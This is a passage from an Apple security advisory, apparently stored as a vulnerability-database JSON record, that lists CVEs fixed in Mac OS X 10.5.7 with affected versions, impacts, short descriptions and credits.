The SNMP service is not enabled by default on Mac OS X or Mac OS X Server.\r\n\r\n *\r\n\r\n Network Time\r\n\r\n CVE-ID: CVE-2009-0021\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Network Time is susceptible to a spoofing attack if NTP authentication is enabled\r\n\r\n Description: The ntpd daemon incorrectly checks the return value of the OpenSSL EVP_VerifyFinal function. On systems using NTPv4 authentication, this may allow a maliciously crafted signature to bypass the cryptographic signature validation, which may lead to a time spoofing attack. By default, NTP authentication is not enabled. This update addresses the issue by properly checking the return value of the EVP_VerifyFinal function.\r\n\r\n *\r\n\r\n Network Time\r\n\r\n CVE-ID: CVE-2009-0159\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Using the ntpq command to request peer information from a malicious remote time server may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in the ntpq program. When the ntpq program is used to request peer information from a remote time server, a maliciously crafted response may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n Networking\r\n\r\n CVE-ID: CVE-2008-3530\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: A remote user may be able to cause an unexpected system shutdown\r\n\r\n Description: When IPv6 support is enabled, IPv6 nodes use ICMPv6 to report errors encountered while processing packets. 
An implementation issue in the handling of incoming ICMPv6 "Packet Too Big" messages may cause an unexpected system shutdown. This update addresses the issue through improved handling of ICMPv6 messages.\r\n\r\n *\r\n\r\n OpenSSL\r\n\r\n CVE-ID: CVE-2008-5077\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: A man-in-the-middle attacker may be able to impersonate a trusted server or user in applications using OpenSSL for SSL certificate verification\r\n\r\n Description: Several functions within the OpenSSL library incorrectly check the result value of the EVP_VerifyFinal function. A man-in-the-middle attacker may be able to impersonate a trusted server or user in applications using OpenSSL for SSL certificate verification for DSA and ECDSA keys. This update addresses the issue by properly checking the return value of the EVP_VerifyFinal function.\r\n\r\n *\r\n\r\n PHP\r\n\r\n CVE-ID: CVE-2008-3659, CVE-2008-2829, CVE-2008-3660, CVE-2008-2666, CVE-2008-2371, CVE-2008-2665, CVE-2008-3658, CVE-2008-5557\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Multiple vulnerabilities in PHP 5.2.6\r\n\r\n Description: PHP is updated to version 5.2.8 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP website at http://www.php.net/\r\n\r\n *\r\n\r\n QuickDraw Manager\r\n\r\n CVE-ID: CVE-2009-0160\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Opening a maliciously crafted PICT image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in QuickDraw's handling of PICT images. 
Opening a maliciously crafted PICT image may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by performing additional validation of PICT images. Credit: Apple.\r\n\r\n *\r\n\r\n QuickDraw Manager\r\n\r\n CVE-ID: CVE-2009-0010\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Opening a maliciously crafted PICT image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An integer underflow in the handling of PICT images may result in a heap buffer overflow. Opening a maliciously crafted PICT file may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by performing additional validation of PICT images. Credit to Damian Put and Sebastian Apelt working with TippingPoint's Zero Day Initiative, and Chris Ries of Carnegie Mellon University Computing Services for reporting this issue.\r\n\r\n *\r\n\r\n ruby\r\n\r\n CVE-ID: CVE-2008-3443, CVE-2008-3655, CVE-2008-3656, CVE-2008-3657, CVE-2008-3790\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Multiple vulnerabilities in Ruby 1.8.6\r\n\r\n Description: Multiple vulnerabilities exist in Ruby 1.8.6. This update addresses the issues by updating Ruby to version 1.8.6-p287. Further information is available via the Ruby web site at http://www.ruby-lang.org/en/security/\r\n\r\n *\r\n\r\n ruby\r\n\r\n CVE-ID: CVE-2009-0161\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Ruby programs may accept revoked certificates\r\n\r\n Description: An incomplete error check exists in Ruby's use of the OpenSSL library. The OpenSSL::OCSP Ruby module may interpret an invalid response as an OCSP validation of the certificate. 
This update addresses the issue through improved error checking while verifying OCSP responses.\r\n\r\n *\r\n\r\n Safari\r\n\r\n CVE-ID: CVE-2009-0162\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Accessing a maliciously crafted "feed:" URL may lead to arbitrary code execution\r\n\r\n Description: Multiple input validation issues exist in Safari's handling of "feed:" URLs. Accessing a maliciously crafted "feed:" URL may lead to the execution of arbitrary JavaScript. This update addresses the issues by performing additional validation of "feed:" URLs. These issues do not affect systems prior to Mac OS X v10.5. Credit to Billy Rios of Microsoft Vulnerability Research (MSVR), and Alfredo Melloni for reporting these issues.\r\n\r\n *\r\n\r\n Spotlight\r\n\r\n CVE-ID: CVE-2009-0944\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Downloading a maliciously crafted Microsoft Office file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: Multiple memory corruption issues exist in the Mac OS X Microsoft Office Spotlight Importer. Downloading a maliciously crafted Microsoft Office file may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by performing additional validation of Microsoft Office files.\r\n\r\n *\r\n\r\n system_cmds\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: The "login" command always runs the default shell with normal priority\r\n\r\n Description: The "login" command starts an interactive shell after a local user is authenticated. The priority level for the interactive shell is reset to the system default, which can cause the shell to run with an unexpectedly high priority. 
This update addresses the issue by respecting the priority setting of the calling process if the caller is the superuser or the user who was successfully logged in.\r\n\r\n *\r\n\r\n telnet\r\n\r\n CVE-ID: CVE-2009-0158\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Connecting to a TELNET server with a very long canonical name in its DNS address record may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in the telnet command. Connecting to a TELNET server with a very long canonical name in its DNS address record may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2009-0945\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Visiting a maliciously crafted website may lead to arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in WebKit's handling of SVGList objects. Visiting a maliciously crafted website may lead to arbitrary code execution. This update addresses the issue through improved bounds checking. For Mac OS X v10.4.11 and Mac OS X Server v10.4.11, updating to Safari 3.2.3 will address this issue. Credit to Nils working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n X11\r\n\r\n CVE-ID: CVE-2006-0747, CVE-2007-2754\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11\r\n\r\n Impact: Multiple vulnerabilities in FreeType v2.1.4\r\n\r\n Description: Multiple vulnerabilities exist in FreeType v2.1.4, the most serious of which may lead to arbitrary code execution when processing a maliciously crafted font. This update addresses the issues by updating FreeType to version 2.3.8. 
Further information is available via the FreeType site at http://www.freetype.org/ The issues are already addressed in systems running Mac OS X v10.5.6.\r\n\r\n *\r\n\r\n X11\r\n\r\n CVE-ID: CVE-2008-2383\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Displaying maliciously crafted data within an xterm terminal may lead to arbitrary code execution\r\n\r\n Description: The xterm program supports a command sequence known as DECRQSS that can be used to return information about the current terminal. The information returned is sent as terminal input similar to keyboard input by a user. Within an xterm terminal, displaying maliciously crafted data containing such sequences may result in command injection. This update addresses the issue by performing additional validation of the output data. This issue does not affect systems prior to Mac OS X v10.5.\r\n\r\n *\r\n\r\n X11\r\n\r\n CVE-ID: CVE-2008-1382, CVE-2009-0040\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Multiple vulnerabilities in libpng version 1.2.26\r\n\r\n Description: Multiple vulnerabilities exist in libpng version 1.2.26, the most serious of which may lead to arbitrary code execution. This update addresses the issues by updating libpng to version 1.2.35. Further information is available via the libpng website at http://www.libpng.org/pub/png/libpng.html These issues do not affect systems prior to Mac OS X v10.5.\r\n\r\n *\r\n\r\n X11\r\n\r\n CVE-ID: CVE-2009-0946\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Multiple vulnerabilities in FreeType v2.3.8\r\n\r\n Description: Multiple integer overflows exist in FreeType v2.3.8, which may lead to an unexpected application termination or arbitrary code execution. This update addresses the issues through improved bounds checking. 
Credit to Tavis Ormandy of the Google Security Team for reporting these issues.\r\n", "modified": "2009-05-14T00:00:00", "published": "2009-05-14T00:00:00", "id": "SECURITYVULNS:DOC:21825", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21825", "title": "About the security content of Security Update 2009-002 / Mac OS X v10.5.7", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}